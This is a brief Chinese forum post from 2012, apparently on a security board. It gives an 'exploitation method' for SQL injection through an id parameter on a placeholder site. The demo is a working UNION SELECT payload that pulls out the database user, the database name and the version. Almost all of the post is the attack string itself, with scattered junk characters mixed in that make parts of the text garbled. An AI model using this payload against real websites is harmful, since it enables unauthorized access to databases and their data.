利用方法:
" V' r$ i* [! N# p! y' R v! V9 M- B http://www.xxx.com/index.php?id=[SQL]" S8 X; S8 ~. z3 }* i
Demo:
% x6 V/ r9 V7 E+ T& I/ M http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |
发表于 2012-9-10 20:47:28
收藏
支持
反对